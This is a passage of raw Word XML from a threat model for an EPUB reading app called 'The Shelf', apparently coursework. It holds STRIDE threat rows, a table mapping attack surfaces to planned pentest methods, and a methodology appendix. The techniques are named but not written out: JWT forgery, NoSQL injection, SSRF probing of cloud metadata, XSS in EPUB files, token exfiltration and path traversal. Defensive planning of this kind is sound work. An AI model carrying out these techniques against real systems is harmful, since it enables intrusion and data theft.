                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No audit log</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64663C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>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0257DB">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C229609">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24D56C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Repud.</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B19F2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14A0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B816BA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-10</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FAC09">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DoS via large EPUB</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7D439B">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2A2E6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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61209754">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7E15BF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DoS</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2C1188">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="704B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589376">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-11</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ED378B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IDOR phantom progress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16AFB">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BB8E04">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44F6D950">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE6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603B79">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tampering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666889">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1C08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720B3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-12</w:t>
            </w:r>
          </w:p>
        </w:tc>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65CF02">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Orphaned progress records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B2FAB">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02ED44">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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1768F581">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE6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7698FA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tampering</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2BF30A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C14FF59">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F12F6CA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>7. Attack Surface Mapped to DAST / Pentest Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D224B">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This section explicitly ties each attack surface element to the planned testing methodology for Weeks 3–4, fulfilling the rubric requirement that the attack surface is mapped to application features and tied to DAST/pentest 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680"/>
        <w:gridCol w:w="2680"/>
      </w:tblGrid>
      <w:tr w14:paraId="501F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77E5C641">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Surface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513D5547">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Threat IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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1FA7001A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Testing Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C9F14EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="778A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97AFE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authentication endpoints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6022D7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-01, T-04, T-06</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959E2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT forgery, NoSQL injection payloads, reset token prediction</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F57D29">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Burp Suite, jwt.io, custom scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="655D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A3718">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EPUB proxy endpoint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F8CD1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-03, T-10</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B4CE00">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSRF probing (internal IPs, cloud metadata), large file DoS</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9B8549">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP ZAP, curl, Burp Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B15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0FC622">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Admin upload endpoint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055D6D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-02, T-05</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AB1E8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Malicious EPUB crafting, mass assignment via PUT body</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2C3AE2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Custom EPUB builder, Burp Repeater</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="05FF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A89E4B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EPUB renderer (client)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368766">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-02, T-07</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26241">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>XSS payload in EPUB, JWT exfiltration from localStorage</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C0B15">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Browser DevTools, custom EPUB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5CB1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F18D40">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>File serve endpoint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EB4818">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-08</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3B095">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Path traversal with URL-encoded sequences</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38D9B0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP ZAP, Burp Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D9E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1F7B4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MongoDB collections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994180">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T-04, T-09, T-11, T-12</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076C56">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NoSQL injection, orphaned record analysis, audit gap verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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6707BA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mongosh, Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48AC12DF">
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27754757">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>8. Appendix: Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C474F8">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Threat Modeling Methodology: STRIDE-per-element, applied to each component in the DFD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391EF6C0">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Risk Scoring: DREAD (Damage, Reproducibility, Exploitability, Affected Users, Discoverability) on a 1–10 scale per dimension. CVSS v3.1 base scores estimated using the FIRST CVSS Calculator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913517C">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Attack Surface Mapping: Derived from manual source code review of server.ts (892 lines) and React frontend components, supplemented by automated SCA (npm audit) and SAST (Semgrep) findings from the CI/CD pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AF19A">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Classification: All threats are categorized by the STRIDE taxonomy and cross-referenced to the OWASP Top 10 (2021) where applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456AD92A">
      <w:pPr>
        <w:spacing w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A60D70">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>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AB046">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8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1927C">
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>The Shelf — Threat Model &amp; Attack Surface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233009AD"/>
    <w:rsid w:val="29BA46F0"/>
    <w:rsid w:val="5B9444F1"/>
    <w:rsid w:val="78006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C3E50"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="160"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A5276"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2980B9"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="100"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2C3E5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C3E5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C3E5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C3E50"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="2C3E5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174</Words>
  <Characters>1054</Characters>
  <TotalTime>9</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1209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2026-05-08T09:15:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>Jotesh Kumar</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-08T09:27:15Z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eyJoZGlkIjoiYzY1MGQyZTgyNWQzYTI3MTZjOTBjMjNkZTYxNWZkODIiLCJ1c2VySWQiOiIxOTQyMDEwMzIyNjcxIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.25862</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>6FADCAA5852D464A86E6C9F4B0BF5296_13</vt:lpwstr>
  </property>
</Properties>
</file>